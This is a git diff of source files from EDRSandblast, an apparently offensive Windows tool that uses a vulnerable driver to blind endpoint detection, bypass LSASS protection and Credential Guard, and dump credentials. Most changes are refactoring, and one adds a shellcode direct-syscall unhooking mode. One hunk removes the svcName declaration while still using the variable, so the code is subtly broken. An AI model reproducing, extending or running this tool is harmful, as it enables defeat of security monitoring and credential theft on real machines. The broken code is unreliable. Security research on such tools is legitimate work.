diff --git a/EDRSandblast/EDRSandBlast.h b/EDRSandblast/EDRSandBlast.h index 36a738d..62329a8 100644 --- a/EDRSandblast/EDRSandBlast.h +++ b/EDRSandblast/EDRSandBlast.h @@ -12,19 +12,18 @@ #include #include -#include "Includes/Globals.h" -#include "Includes/CredGuard.h" -#include "Includes/DriverOps.h" -#include "Includes/ETWThreatIntel.h" -#include "Includes/FileVersion.h" -#include "Includes/KernelCallbacks.h" -#include "Includes/KernelMemoryPrimitives.h" -#include "Includes/KernelPatternSearch.h" -#include "Includes/LSASSDump.h" -#include "Includes/NtoskrnlOffsets.h" -#include "Includes/RunAsPPL.h" -#include "Includes/WdigestOffsets.h" -#include "Includes/UserlandHooks.h" +#include "CredGuard.h" +#include "DriverOps.h" +#include "ETWThreatIntel.h" +#include "FileVersion.h" +#include "KernelCallbacks.h" +#include "KernelMemoryPrimitives.h" +#include "KernelPatternSearch.h" +#include "LSASSDump.h" +#include "NtoskrnlOffsets.h" +#include "RunAsPPL.h" +#include "WdigestOffsets.h" +#include "UserlandHooks.h" typedef enum _START_MODE { dump, diff --git a/EDRSandblast/EDRSandblast.c b/EDRSandblast/EDRSandblast.c index 0c385fc..e5a9aaa 100644 --- a/EDRSandblast/EDRSandblast.c +++ b/EDRSandblast/EDRSandblast.c @@ -38,6 +38,8 @@ Actions mode:\n\ \t4 Loads an additional version of ntdll library into memory, and use the (hopefully\n\ \t unmonitored) version of NtProtectVirtualMemory present in this library to remove all\n\ \t present userland hooks.\n\ +\t5 Allocates a shellcode that uses a direct syscall to call NtProtectVirtualMemory,\n\ +\t and uses it to remove all detected hooks\n\ \n\ Other options:\n\ \n\ @@ -492,7 +494,7 @@ Other options:\n\ status = UninstallVulnerableDriver(); if (status == FALSE) { _tprintf(TEXT("[!] An error occured while attempting to uninstall the vulnerable driver\n")); - _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), serviceName); + _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), GetServiceName()); lpExitCode = EXIT_FAILURE; } else { diff --git a/EDRSandblast/EDRSandblast.vcxproj b/EDRSandblast/EDRSandblast.vcxproj index 0afe1bd..96833f6 100644 --- a/EDRSandblast/EDRSandblast.vcxproj +++ b/EDRSandblast/EDRSandblast.vcxproj @@ -125,7 +125,7 @@ _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug - Includes/ + Includes\ Console @@ -174,7 +174,6 @@ - diff --git a/EDRSandblast/EDRSandblast.vcxproj.filters b/EDRSandblast/EDRSandblast.vcxproj.filters index 488530f..614e3eb 100644 --- a/EDRSandblast/EDRSandblast.vcxproj.filters +++ b/EDRSandblast/EDRSandblast.vcxproj.filters @@ -98,9 +98,6 @@ Header Files - - Header Files - Header Files diff --git a/EDRSandblast/Includes/CredGuard.h b/EDRSandblast/Includes/CredGuard.h index 16f2c56..6ff7179 100644 --- a/EDRSandblast/Includes/CredGuard.h +++ b/EDRSandblast/Includes/CredGuard.h @@ -6,7 +6,6 @@ #include #include -#include "Globals.h" #include "WdigestOffsets.h" DWORD WINAPI disableCredGuardByPatchingLSASS(void); diff --git a/EDRSandblast/Includes/DriverOps.h b/EDRSandblast/Includes/DriverOps.h index baf76b3..88ee272 100644 --- a/EDRSandblast/Includes/DriverOps.h +++ b/EDRSandblast/Includes/DriverOps.h @@ -11,8 +11,8 @@ #include #include #include +#include -#include "Globals.h" #if !defined(PRINT_ERROR_AUTO) #define PRINT_ERROR_AUTO(func) (_tprintf(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError())) diff --git a/EDRSandblast/Includes/ETWThreatIntel.h b/EDRSandblast/Includes/ETWThreatIntel.h index 6b6de81..77d1ad8 100644 --- a/EDRSandblast/Includes/ETWThreatIntel.h +++ b/EDRSandblast/Includes/ETWThreatIntel.h @@ -11,7 +11,6 @@ #include #include -#include "Globals.h" #include "KernelMemoryPrimitives.h" #include "NtoskrnlOffsets.h" diff --git a/EDRSandblast/Includes/Globals.h b/EDRSandblast/Includes/Globals.h deleted file mode 100644 index 7846594..0000000 --- a/EDRSandblast/Includes/Globals.h +++ /dev/null @@ -1,9 +0,0 @@ -#pragma once - -extern union NtoskrnlOffsets ntoskrnlOffsets; - -extern union WdigestOffsets wdigestOffsets; - -//extern TCHAR* serviceName; - -extern TCHAR* serviceName; \ No newline at end of file diff --git a/EDRSandblast/Includes/KernelCallbacks.h b/EDRSandblast/Includes/KernelCallbacks.h index f81c1d7..1e902bc 100644 --- a/EDRSandblast/Includes/KernelCallbacks.h +++ b/EDRSandblast/Includes/KernelCallbacks.h @@ -11,7 +11,6 @@ #include #include -#include "Globals.h" #include "DriverOps.h" #include "KernelMemoryPrimitives.h" #include "NtoskrnlOffsets.h" diff --git a/EDRSandblast/Includes/KernelMemoryPrimitives.h b/EDRSandblast/Includes/KernelMemoryPrimitives.h index 4f7b641..1383aff 100644 --- a/EDRSandblast/Includes/KernelMemoryPrimitives.h +++ b/EDRSandblast/Includes/KernelMemoryPrimitives.h @@ -12,7 +12,6 @@ #include #include -#include "Globals.h" struct RTCORE64_MSR_READ { DWORD Register; diff --git a/EDRSandblast/Includes/NtoskrnlOffsets.h b/EDRSandblast/Includes/NtoskrnlOffsets.h index 5cdc974..92b9770 100644 --- a/EDRSandblast/Includes/NtoskrnlOffsets.h +++ b/EDRSandblast/Includes/NtoskrnlOffsets.h @@ -10,7 +10,6 @@ #include #include -#include "Globals.h" #include "FileVersion.h" enum NtoskrnlOffsetType { diff --git a/EDRSandblast/Includes/RunAsPPL.h b/EDRSandblast/Includes/RunAsPPL.h index 1c93825..eb73ac2 100644 --- a/EDRSandblast/Includes/RunAsPPL.h +++ b/EDRSandblast/Includes/RunAsPPL.h @@ -12,7 +12,6 @@ #include #include -#include "Globals.h" #include "KernelMemoryPrimitives.h" #include "NtoskrnlOffsets.h" diff --git a/EDRSandblast/Includes/WdigestOffsets.h b/EDRSandblast/Includes/WdigestOffsets.h index e690403..00dc050 100644 --- a/EDRSandblast/Includes/WdigestOffsets.h +++ b/EDRSandblast/Includes/WdigestOffsets.h @@ -11,7 +11,6 @@ #include #include -#include "Globals.h" #include "FileVersion.h" enum WdigestOffsetType { diff --git a/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c b/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c index 5cf087c..7dcd469 100644 --- a/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c +++ b/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c @@ -14,7 +14,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) { // Open an handle to our own process. HANDLE selfProcessHandle = OpenProcess(SYNCHRONIZE, FALSE, currentProcessID); if (verbose) { - _tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)selfProcessHandle); + _tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)((ULONG_PTR)selfProcessHandle)); } @@ -72,7 +72,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) { _tprintf(TEXT("[*] Handle for the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object); } - if (handleInfo.HandleValue == (USHORT)selfProcessHandle) { + if (handleInfo.HandleValue == (USHORT)((ULONG_PTR)selfProcessHandle)) { _tprintf(TEXT("[+] Found the handle of the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object); returnAddress = (DWORD64)handleInfo.Object; } diff --git a/EDRSandblast/Utils/DriverOps.c b/EDRSandblast/Utils/DriverOps.c index 0a71721..2f5762c 100644 --- a/EDRSandblast/Utils/DriverOps.c +++ b/EDRSandblast/Utils/DriverOps.c @@ -42,7 +42,6 @@ BOOL ServiceAddEveryoneAccess(SC_HANDLE serviceHandle) { } DWORD ServiceInstall(PCTSTR serviceName, PCTSTR displayName, PCTSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt) { - BOOL status = FALSE; SC_HANDLE hSC = NULL, hS = NULL; hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE); @@ -179,7 +178,7 @@ BOOL ServiceUninstall(PCTSTR serviceName, DWORD attemptCount) { */ static TCHAR* randString(TCHAR* str, size_t size) { - srand(time(0)); + srand((unsigned int) time(0)); const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789"; if (size) { @@ -192,7 +191,9 @@ static TCHAR* randString(TCHAR* str, size_t size) { return str; } + TCHAR* serviceName; + TCHAR* GetServiceName(void) { if (!serviceName || _tcslen(serviceName) == 0) { serviceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR)); @@ -216,11 +217,9 @@ void SetServiceName(TCHAR *newName, size_t szNewName) { } BOOL InstallVulnerableDriver(TCHAR* driverPath) { - TCHAR* svcName = GetServiceName(); - const TCHAR svcDesc[] = TEXT(""); - DWORD status = ServiceInstall(serviceName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE); + DWORD status = ServiceInstall(svcName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE); if (status == 0x00000005) { _tprintf(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?\n"));